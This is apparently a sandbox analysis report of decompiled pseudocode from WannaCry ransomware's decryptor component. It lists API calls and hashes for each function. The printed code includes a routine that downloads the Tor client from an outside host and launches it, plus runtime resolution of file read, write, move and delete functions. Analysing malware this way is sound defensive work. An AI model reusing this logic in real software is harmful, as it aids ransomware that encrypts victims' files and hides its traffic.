						sprintf( &_v520, "%s\\%s\\%s", "TaskData", "Tor", "tor.exe");
						_t84 = _t86 + 0x20;
						if(GetFileAttributesA( &_v520) != 0xffffffff) {
							CopyFileA( &_v520,  &_v1040, 0);
							goto L8;
						} else {
							return 0;
						}
					} else {
						_push(0);
						_t55 = E0040B780( &_v1040, "TaskData", "https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip");
						_t86 = _t86 + 0xc;
						if(_t55 != 0) {
							goto L5;
						} else {
							_push(0);
							_t56 = E0040B780( &_v1040, "TaskData", 0x4221ac);
							_t86 = _t86 + 0xc;
							if(_t56 != 0) {
								goto L5;
							} else {
								return _t56;
							}
						}
					}
				}
			}
















                                                      0x0040b846
                                                      0x0040b84d
                                                      0x0040b861
                                                      0x0040b863
                                                      0x0040b879
                                                      0x0040b87a
                                                      0x0040b885
                                                      0x0040b892
                                                      0x0040b95b
                                                      0x0040b966
                                                      0x0040b970
                                                      0x0040b974
                                                      0x0040b976
                                                      0x0040b982
                                                      0x0040b991
                                                      0x0040b995
                                                      0x0040b99f
                                                      0x0040b9b2
                                                      0x0040b9d6
                                                      0x0040b9e2
                                                      0x0040b9e2
                                                      0x0040b9ef
                                                      0x0040b9f6
                                                      0x0040ba02
                                                      0x0040b9b5
                                                      0x0040b9be
                                                      0x0040b9be
                                                      0x0040b898
                                                      0x0040b8a4
                                                      0x0040b8a9
                                                      0x0040b8ae
                                                      0x0040b8e9
                                                      0x0040b8e9
                                                      0x0040b8f3
                                                      0x0040b908
                                                      0x0040b90a
                                                      0x0040b923
                                                      0x0040b924
                                                      0x0040b929
                                                      0x0040b939
                                                      0x0040b955
                                                      0x00000000
                                                      0x0040b93c
                                                      0x0040b945
                                                      0x0040b945
                                                      0x0040b8b0
                                                      0x0040b8b0
                                                      0x0040b8bc
                                                      0x0040b8c1
                                                      0x0040b8c6
                                                      0x00000000
                                                      0x0040b8c8
                                                      0x0040b8c8
                                                      0x0040b8d4
                                                      0x0040b8d9
                                                      0x0040b8de
                                                      0x00000000
                                                      0x0040b8e8
                                                      0x0040b8e8
                                                      0x0040b8e8
                                                      0x0040b8de
                                                      0x0040b8c6
                                                      0x0040b8ae

                                                      APIs
                                                      • sprintf.MSVCRT ref: 0040B87A
                                                      • GetFileAttributesA.KERNEL32(?,?,?,?,00000000,?), ref: 0040B88D
                                                      • CreateProcessA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040B9AA
                                                        • Part of subcall function 0040B6A0: CreateDirectoryA.KERNEL32(?,00000000,?,76E83310,00000000,0019FA30), ref: 0040B6B4
                                                        • Part of subcall function 0040B6A0: DeleteFileA.KERNEL32(?), ref: 0040B6D9
                                                      • sprintf.MSVCRT ref: 0040B924
                                                      • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040B934
                                                        • Part of subcall function 0040B780: CreateDirectoryA.KERNEL32(?,00000000,?,76E83310,0019FA30), ref: 0040B793
                                                        • Part of subcall function 0040B780: GetTempFileNameA.KERNEL32(?,004214DC,00000000,?), ref: 0040B7D4
                                                        • Part of subcall function 0040B780: DeleteUrlCacheEntry.WININET(?), ref: 0040B7DB
                                                        • Part of subcall function 0040B780: URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0040B7ED
                                                        • Part of subcall function 0040B780: DeleteFileA.KERNEL32(?), ref: 0040B815
                                                      • CopyFileA.KERNEL32(?,?,00000000), ref: 0040B955
                                                      • WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040B9CF
                                                      • WaitForSingleObject.KERNEL32(?,00007530,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040B9E2
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,08000000), ref: 0040B9EF
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,08000000), ref: 0040B9F6
                                                        • Part of subcall function 0040B780: DeleteFileA.KERNEL32(?), ref: 0040B82C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Delete$Create$AttributesCloseDirectoryHandleObjectSingleWaitsprintf$CacheCopyDownloadEntryNameProcessTemp
                                                      • String ID: %s\%s\%s$D$TaskData$Tor$https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$s.wnry$taskhsvc.exe$tor.exe
                                                      • API String ID: 4284242699-3937372533
                                                      • Opcode ID: 09006d51623bf6324b32cedefd723180e41c2e4a94ec42060d8d8d083510f0e4
                                                      • Instruction ID: 35d80fb58dc1195f77b7b167f0129d00e9adf464e01d9889cd120ecf7352bd78
                                                      • Opcode Fuzzy Hash: 09006d51623bf6324b32cedefd723180e41c2e4a94ec42060d8d8d083510f0e4
                                                      • Instruction Fuzzy Hash: 0C4137716443007AD710DBA4EC41BEBB7D4AFE8700F90883FF698532E1D6B99548879E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004032C0 Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 114windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 69%
                                                      			E004032C0(intOrPtr __ecx) {
				intOrPtr _t16;
				long _t17;
				struct HFONT__* _t19;
				long _t20;
				long _t21;
				long _t23;
				int _t35;
				int _t38;
				int _t40;
				int _t47;
				intOrPtr _t48;

				_t48 = __ecx;
				L00412CB0();
				_t16 =  *0x42189c; // 0x19f608
				_t17 =  *(_t16 + 0x824);
				 *(__ecx + 0xe8) = _t17;
				_push(CreateSolidBrush(_t17));
				L00412D5E();
				_t47 = __ecx + 0xec;
				_t19 = CreateFontA(0x10, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial");
				_push(_t19);
				L00412D5E();
				_push(0x408);
				L00412CE6();
				if(_t47 != 0) {
					_t35 =  *(_t47 + 4);
				} else {
					_t35 = 0;
				}
				_t20 = SendMessageA( *(_t19 + 0x20), 0x30, _t35, 1);
				_push(0x409);
				L00412CE6();
				if(_t47 != 0) {
					_t38 =  *(_t47 + 4);
				} else {
					_t38 = 0;
				}
				_t21 = SendMessageA( *(_t20 + 0x20), 0x30, _t38, 1);
				_push(2);
				L00412CE6();
				if(_t47 != 0) {
					_t40 =  *(_t47 + 4);
				} else {
					_t40 = 0;
				}
				_t23 = SendMessageA( *(_t21 + 0x20), 0x30, _t40, 1);
				_push(0x40e);
				L00412CE6();
				if(_t47 != 0) {
					_t47 =  *(_t47 + 4);
				}
				SendMessageA( *(_t23 + 0x20), 0x30, _t47, 1);
				E00403CB0(_t48);
				SendMessageA( *(_t48 + 0xc0), 0x14e, 0, 0);
				_push(0xffffffff);
				_push(0xffffffff);
				_push(0);
				_push("Path");
				_push(0);
				L00412D58();
				SendMessageA( *(_t48 + 0x80), 0x101e, 0, 0x1f4);
				 *0x4217bc = _t48;
				return 1;
			}














                                                      0x004032c3
                                                      0x004032c5
                                                      0x004032ca
                                                      0x004032cf
                                                      0x004032d6
                                                      0x004032e2
                                                      0x004032e9
                                                      0x00403310
                                                      0x00403316
                                                      0x0040331c
                                                      0x0040331f
                                                      0x00403324
                                                      0x0040332b
                                                      0x00403332
                                                      0x00403338
                                                      0x00403334
                                                      0x00403334
                                                      0x00403334
                                                      0x0040334a
                                                      0x0040334c
                                                      0x00403353
                                                      0x0040335a
                                                      0x00403360
                                                      0x0040335c
                                                      0x0040335c
                                                      0x0040335c
                                                      0x0040336c
                                                      0x0040336e
                                                      0x00403372
                                                      0x00403379
                                                      0x0040337f
                                                      0x0040337b
                                                      0x0040337b
                                                      0x0040337b
                                                      0x0040338b
                                                      0x0040338d
                                                      0x00403394
                                                      0x0040339b
                                                      0x0040339d
                                                      0x0040339d
                                                      0x004033a9
                                                      0x004033ad
                                                      0x004033c2
                                                      0x004033c4
                                                      0x004033c6
                                                      0x004033c8
                                                      0x004033ca
                                                      0x004033cf
                                                      0x004033d4
                                                      0x004033ec
                                                      0x004033ee
                                                      0x004033fc

                                                      APIs
                                                      • #4710.MFC42 ref: 004032C5
                                                      • CreateSolidBrush.GDI32(?), ref: 004032DC
                                                      • #1641.MFC42(00000000), ref: 004032E9
                                                      • CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00403316
                                                      • #1641.MFC42(00000000), ref: 0040331F
                                                      • #3092.MFC42(00000408,00000000), ref: 0040332B
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040334A
                                                      • #3092.MFC42(00000409), ref: 00403353
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040336C
                                                      • #3092.MFC42(00000002), ref: 00403372
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040338B
                                                      • #3092.MFC42(0000040E), ref: 00403394
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 004033A9
                                                      • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 004033C2
                                                      • #3996.MFC42(00000000,Path,00000000,000000FF,000000FF), ref: 004033D4
                                                      • SendMessageA.USER32(?,0000101E,00000000,000001F4), ref: 004033EC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#3092$#1641Create$#3996#4710BrushFontSolid
                                                      • String ID: Arial$Path
                                                      • API String ID: 2448086372-1872211634
                                                      • Opcode ID: 54367d22f402edf92e4263bf03619f0e020ba41dcf2f2cd55327d399c3bd1a02
                                                      • Instruction ID: b960ea7794e319caf0268359e71fff6d42033abaa4d887be80586a06fbef81fd
                                                      • Opcode Fuzzy Hash: 54367d22f402edf92e4263bf03619f0e020ba41dcf2f2cd55327d399c3bd1a02
                                                      • Instruction Fuzzy Hash: 4831D5B13907107BE6249760CD83FAE6659BB84B10F20421EB756BF2D1CEF8AD41879C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00402C40 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 72libraryloaderCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00402C40() {
				_Unknown_base(*)()* _t11;
				struct HINSTANCE__* _t23;

				if(E00404B70() == 0) {
					L12:
					return 0;
				} else {
					if( *0x4217a0 == 0) {
						_t23 = LoadLibraryA("kernel32.dll");
						if(_t23 == 0) {
							goto L12;
						} else {
							 *0x4217a0 = GetProcAddress(_t23, "CreateFileW");
							 *0x4217a4 = GetProcAddress(_t23, "WriteFile");
							 *0x4217a8 = GetProcAddress(_t23, "ReadFile");
							 *0x4217ac = GetProcAddress(_t23, "MoveFileW");
							 *0x4217b0 = GetProcAddress(_t23, "MoveFileExW");
							 *0x4217b4 = GetProcAddress(_t23, "DeleteFileW");
							_t11 = GetProcAddress(_t23, "CloseHandle");
							 *0x4217b8 = _t11;
							if( *0x4217a0 == 0 ||  *0x4217a4 == 0 ||  *0x4217a8 == 0 ||  *0x4217ac == 0 ||  *0x4217b0 == 0 ||  *0x4217b4 == 0 || _t11 == 0) {
								goto L12;
							} else {
								return 1;
							}
						}
					} else {
						return 1;
					}
				}
			}





                                                      0x00402c48
                                                      0x00402d1d
                                                      0x00402d20
                                                      0x00402c4e
                                                      0x00402c55
                                                      0x00402c69
                                                      0x00402c6d
                                                      0x00000000
                                                      0x00402c73
                                                      0x00402c88
                                                      0x00402c95
                                                      0x00402ca2
                                                      0x00402caf
                                                      0x00402cbc
                                                      0x00402cc9
                                                      0x00402cce
                                                      0x00402cd6
                                                      0x00402cde
                                                      0x00000000
                                                      0x00402d16
                                                      0x00402d1c
                                                      0x00402d1c
                                                      0x00402cde
                                                      0x00402c57
                                                      0x00402c5d
                                                      0x00402c5d
                                                      0x00402c55

                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00402C63
                                                      • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00402C80
                                                      • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00402C8D
                                                      • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 00402C9A
                                                      • GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 00402CA7
                                                      • GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 00402CB4
                                                      • GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 00402CC1
                                                      • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00402CCE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$LibraryLoad
                                                      • String ID: CloseHandle$CreateFileW$DeleteFileW$MoveFileExW$MoveFileW$ReadFile$WriteFile$kernel32.dll
                                                      • API String ID: 2238633743-1294736154
                                                      • Opcode ID: 468b1d099fd8a0684a95be66b91aae829347793d9c58d8a41e664e10bf98f029
                                                      • Instruction ID: a2b5d8bb757b14b28e15fb80ad1863100e1319e91a413c2d323d0fcc62a15203
                                                      • Opcode Fuzzy Hash: 468b1d099fd8a0684a95be66b91aae829347793d9c58d8a41e664e10bf98f029
                                                      • Instruction Fuzzy Hash: AA110334B423216BD734AB25BD58FA72695EFD4701795003FA801E76E1D7B89C42CA5C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00408D70 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 257COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 75%
                                                      			E00408D70(intOrPtr __ecx, signed long long __fp0, intOrPtr* _a4, int _a8, signed int _a12, unsigned int _a16, signed int _a20) {
				intOrPtr _v0;
				unsigned int _v4;
				unsigned int _v8;
				unsigned int _v12;
				intOrPtr _v20;
				char _v36;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v64;
				char _v68;
				unsigned int _v72;
				signed int _v76;
				signed int _v80;
				intOrPtr _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed long long _v100;
				intOrPtr _v104;
				void* _v108;
				void* _v112;
				void* _v120;
				unsigned int _t93;
				signed int _t96;
				signed int _t100;
				unsigned int _t102;
				signed int _t107;
				int _t112;
				char _t113;
				signed char _t115;
				RECT* _t122;
				signed int _t125;
				signed int _t134;
				intOrPtr* _t135;
				unsigned int _t138;
				signed int _t140;
				signed int _t143;
				intOrPtr* _t146;
				char _t151;
				char _t152;
				signed int _t169;
				intOrPtr* _t177;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t195;
				unsigned int _t202;
				char _t209;
				intOrPtr _t210;
				signed long long _t228;
				signed long long _t229;
				signed long long _t230;
				signed long long _t231;
				signed long long _t234;

				_t228 = __fp0;
				_push(0xffffffff);
				_push(E004140A0);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t210;
				_t93 = _a20;
				_v104 = __ecx;
				_t138 = _a16;
				_t169 = _t138 & 0x000000ff;
				_v76 = _t169;
				_t192 = (_t93 & 0x000000ff) - _t169;
				_t140 = _t138 >> 0x00000010 & 0x000000ff;
				_t96 = (_t93 >> 0x00000010 & 0x000000ff) - _t140;
				_v88 = 0;
				_v96 = _t96;
				_v92 = _t140;
				asm("cdq");
				_t143 = _t96 ^ 0;
				_v100 = 0;
				asm("cdq");
				_a20 = _t192;
				_t134 = 0;
				if(0 <= _t143) {
					_t134 = _t143;
				}
				asm("cdq");
				_t100 = _t192 ^ 0;
				if(_t100 <= _t134) {
					_a16 = 0;
					if(0 <= _t143) {
						_a16 = _t143;
					}
				} else {
					_a16 = _t100;
				}
				_t193 = _a8;
				_t102 =  *((intOrPtr*)(_t193 + 8)) -  *_t193;
				if(_t102 < _a16) {
					_a16 = _t102;
				}
				if(_a16 == 0) {
					_a16 = 1;
				}
				asm("fild dword [esp+0x88]");
				asm("fild dword [esp+0x8c]");
				_t135 = _a4;
				_t229 = _t228 / st1;
				_v80 = _t229;
				asm("fild dword [esp+0x1c]");
				_t230 = _t229 / st1;
				_v100 = _t230;
				asm("fild dword [esp+0x20]");
				_t231 = _t230 / st1;
				_v96 = _t231;
				st0 = _t231;
				_t107 = GetDeviceCaps( *( *_t135 + 8), 0x26) & 0x00000100;
				_v80 = _t107;
				if(_t107 == 0 && _a8 > 1) {
					_t125 = GetDeviceCaps( *( *_t135 + 8), 0xc);
					if(GetDeviceCaps( *( *_t135 + 8), 0xe) * _t125 < 8) {
						_v8 = 1;
					}
				}
				_t146 = _t193;
				_a12 =  *((intOrPtr*)(_t193 + 8)) -  *_t193;
				_t202 = 0;
				asm("fild dword [esp+0x8c]");
				_v72 = 0;
				_v68 =  *_t146;
				_v76 = 0x415a44;
				asm("fidiv dword [esp+0x88]");
				_v64 =  *((intOrPtr*)(_t146 + 4));
				_v60 =  *((intOrPtr*)(_t146 + 8));
				_v56 =  *((intOrPtr*)(_t146 + 0xc));
				_a12 = _t231;
				_t112 = _a8;
				_v12 = 0;
				_v4 = 0;
				if(_t112 <= 0) {
					L31:
					_v76 = 0x415c00;
					_v12 = 1;
					L00412D52();
					 *[fs:0x0] = _v20;
					return _t112;
				} else {
					while(1) {
						asm("fild dword [esp+0x7c]");
						_t195 =  *_t193;
						L0041304A();
						_t46 = _t202 + 1; // 0x1
						_v4 = _t46;
						_t209 = _t112 + _t195;
						asm("fild dword [esp+0x7c]");
						_v68 = _t209;
						_t234 = st0 * _a12 * _a12;
						L0041304A();
						_t113 = _t112 + _t195;
						_v60 = _t113;
						if(_t202 == _a8 - 1) {
							_t113 =  *((intOrPtr*)(_v0 + 8));
							_v60 = _t113;
						}
						_t177 = _a4;
						_t151 =  *_t177;
						if(_t113 < _t151) {
							goto L29;
						}
						if(_t209 < _t151) {
							_v68 = _t151;
						}
						_t152 =  *((intOrPtr*)(_t177 + 8));
						if(_t113 > _t152) {
							_v60 = _t152;
						}
						L0041304A();
						_v92 = 0;
						L0041304A();
						_t115 = _t113 + _v100 + _v96;
						_v92 = _t115 << 8;
						L0041304A();
						_push(_t115 + _v84 & 0x000000ff | _v92);
						if(_v80 == 0) {
							_t112 = E00409D40( &_v36, _t135,  &_v68);
							_push(_t112);
							L00412FF2();
						} else {
							_push(CreateSolidBrush());
							L00412D5E();
							_t122 = E00409D40( &_v60, _t135,  &_v76);
							_t76 =  &_v96; // 0x415a44
							asm("sbb ecx, ecx");
							_t112 = FillRect( *( *_t135 + 4), _t122,  ~_t76 & _v92);
							L00412D52();
						}
						if(_v68 <  *((intOrPtr*)(_v4 + 8))) {
							L30:
							_t202 = _v4;
							_t112 = _a8;
							_v4 = _t202;
							if(_t202 < _t112) {
								_t193 = _v0;
								continue;
							}
						}
						goto L31;
						L29:
						st0 = _t234;
						goto L30;
					}
				}
			}
























































                                                      0x00408d70
                                                      0x00408d70
                                                      0x00408d72
                                                      0x00408d7d
                                                      0x00408d7e
                                                      0x00408d88
                                                      0x00408d8d
                                                      0x00408d92
                                                      0x00408d9f
                                                      0x00408dab
                                                      0x00408daf
                                                      0x00408dc5
                                                      0x00408dd6
                                                      0x00408dd8
                                                      0x00408dde
                                                      0x00408de2
                                                      0x00408de6
                                                      0x00408def
                                                      0x00408df1
                                                      0x00408df5
                                                      0x00408df8
                                                      0x00408e05
                                                      0x00408e07
                                                      0x00408e09
                                                      0x00408e09
                                                      0x00408e0d
                                                      0x00408e10
                                                      0x00408e14
                                                      0x00408e21
                                                      0x00408e28
                                                      0x00408e2a
                                                      0x00408e2a
                                                      0x00408e16
                                                      0x00408e16
                                                      0x00408e16
                                                      0x00408e31
                                                      0x00408e44
                                                      0x00408e48
                                                      0x00408e4a
                                                      0x00408e4a
                                                      0x00408e5a
                                                      0x00408e5c
                                                      0x00408e5c
                                                      0x00408e67
                                                      0x00408e6e
                                                      0x00408e75
                                                      0x00408e81
                                                      0x00408e89
                                                      0x00408e8d
                                                      0x00408e91
                                                      0x00408e93
                                                      0x00408e97
                                                      0x00408e9b
                                                      0x00408e9d
                                                      0x00408ea1
                                                      0x00408ea5
                                                      0x00408eaa
                                                      0x00408eae
                                                      0x00408ec2
                                                      0x00408ed6
                                                      0x00408ed8
                                                      0x00408ed8
                                                      0x00408ed6
                                                      0x00408eea
                                                      0x00408eec
                                                      0x00408ef3
                                                      0x00408ef5
                                                      0x00408efe
                                                      0x00408f02
                                                      0x00408f06
                                                      0x00408f0e
                                                      0x00408f18
                                                      0x00408f1f
                                                      0x00408f26
                                                      0x00408f2a
                                                      0x00408f31
                                                      0x00408f38
                                                      0x00408f3e
                                                      0x00408f42
                                                      0x004090b6
                                                      0x004090b6
                                                      0x004090c2
                                                      0x004090ca
                                                      0x004090d7
                                                      0x004090e1
                                                      0x00408f48
                                                      0x00408f51
                                                      0x00408f51
                                                      0x00408f55
                                                      0x00408f60
                                                      0x00408f65
                                                      0x00408f6a
                                                      0x00408f6e
                                                      0x00408f70
                                                      0x00408f74
                                                      0x00408f78
                                                      0x00408f7f
                                                      0x00408f8b
                                                      0x00408f8d
                                                      0x00408f96
                                                      0x00408f9f
                                                      0x00408fa2
                                                      0x00408fa2
                                                      0x00408fa6
                                                      0x00408fad
                                                      0x00408fb1
                                                      0x00000000
                                                      0x00000000
                                                      0x00408fb9
                                                      0x00408fbb
                                                      0x00408fbb
                                                      0x00408fbf
                                                      0x00408fc4
                                                      0x00408fc6
                                                      0x00408fc6
                                                      0x00408fd0
                                                      0x00408fe5
                                                      0x00408fe9
                                                      0x00408ffa
                                                      0x00409001
                                                      0x00409005
                                                      0x00409021
                                                      0x00409022
                                                      0x0040907e
                                                      0x00409085
                                                      0x00409086
                                                      0x00409024
                                                      0x0040902a
                                                      0x0040902f
                                                      0x00409043
                                                      0x0040904e
                                                      0x00409054
                                                      0x0040905e
                                                      0x00409068
                                                      0x00409068
                                                      0x00409099
                                                      0x0040909f
                                                      0x0040909f
                                                      0x004090a3
                                                      0x004090ac
                                                      0x004090b0
                                                      0x00408f4a
                                                      0x00000000
                                                      0x00408f4a
                                                      0x004090b0
                                                      0x00000000
                                                      0x0040909d
                                                      0x0040909d
                                                      0x00000000
                                                      0x0040909d
                                                      0x00408f51

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _ftol$CapsDevice$#2414$#1641#2754BrushCreateFillRectSolid
                                                      • String ID: DZA
                                                      • API String ID: 2487345631-3378329814
                                                      • Opcode ID: 46f8ac59b565287c612820a18e91b1c7afa6038287a955736cfc91f47d65fae1
                                                      • Instruction ID: dda82c2241e8f2351b86cfb5efeedf8da928c70a362fdc9ee550b763b14e0e54
                                                      • Opcode Fuzzy Hash: 46f8ac59b565287c612820a18e91b1c7afa6038287a955736cfc91f47d65fae1
                                                      • Instruction Fuzzy Hash: 2CA147716087418FC324DF25C984AAABBE1FFC8704F148A2EF599D7291DA39D845CF86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404DD0 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 89windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 78%
                                                      			E00404DD0(void* __ecx) {
				intOrPtr _t12;
				long _t13;
				struct HFONT__* _t15;
				long _t16;
				long _t17;
				int _t29;
				int _t32;
				int _t35;

				L00412CB0();
				_t12 =  *0x42189c; // 0x19f608
				_t13 =  *(_t12 + 0x824);
				 *(__ecx + 0x6c) = _t13;
				_push(CreateSolidBrush(_t13));
				L00412D5E();
				_t35 = __ecx + 0x70;
				_t15 = CreateFontA(0x10, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial");
				_push(_t15);
				L00412D5E();
				_push(0x403);
				L00412CE6();
				if(_t35 != 0) {
					_t29 =  *(_t35 + 4);
				} else {
					_t29 = 0;
				}
				_t16 = SendMessageA( *(_t15 + 0x20), 0x30, _t29, 1);
				_push(1);
				L00412CE6();
				if(_t35 != 0) {
					_t32 =  *(_t35 + 4);
				} else {
					_t32 = 0;
				}
				_t17 = SendMessageA( *(_t16 + 0x20), 0x30, _t32, 1);
				_push(2);
				L00412CE6();
				if(_t35 != 0) {
					SendMessageA( *(_t17 + 0x20), 0x30,  *(_t35 + 4), 1);
					return 1;
				} else {
					SendMessageA( *(_t17 + 0x20), 0x30, _t35, 1);
					return 1;
				}
			}











                                                      0x00404dd5
                                                      0x00404dda
                                                      0x00404ddf
                                                      0x00404de6
                                                      0x00404def
                                                      0x00404df3
                                                      0x00404e1a
                                                      0x00404e1d
                                                      0x00404e23
                                                      0x00404e26
                                                      0x00404e2b
                                                      0x00404e32
                                                      0x00404e39
                                                      0x00404e3f
                                                      0x00404e3b
                                                      0x00404e3b
                                                      0x00404e3b
                                                      0x00404e51
                                                      0x00404e53
                                                      0x00404e57
                                                      0x00404e5e
                                                      0x00404e64
                                                      0x00404e60
                                                      0x00404e60
                                                      0x00404e60
                                                      0x00404e70
                                                      0x00404e72
                                                      0x00404e76
                                                      0x00404e7d
                                                      0x00404e9f
                                                      0x00404ea9
                                                      0x00404e7f
                                                      0x00404e88
                                                      0x00404e92
                                                      0x00404e92

                                                      APIs
                                                      • #4710.MFC42 ref: 00404DD5
                                                      • CreateSolidBrush.GDI32(?), ref: 00404DE9
                                                      • #1641.MFC42(00000000), ref: 00404DF3
                                                      • CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00404E1D
                                                      • #1641.MFC42(00000000), ref: 00404E26
                                                      • #3092.MFC42(00000403,00000000), ref: 00404E32
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E51
                                                      • #3092.MFC42(00000001), ref: 00404E57
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E70
                                                      • #3092.MFC42(00000002), ref: 00404E76
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E88
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E9F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
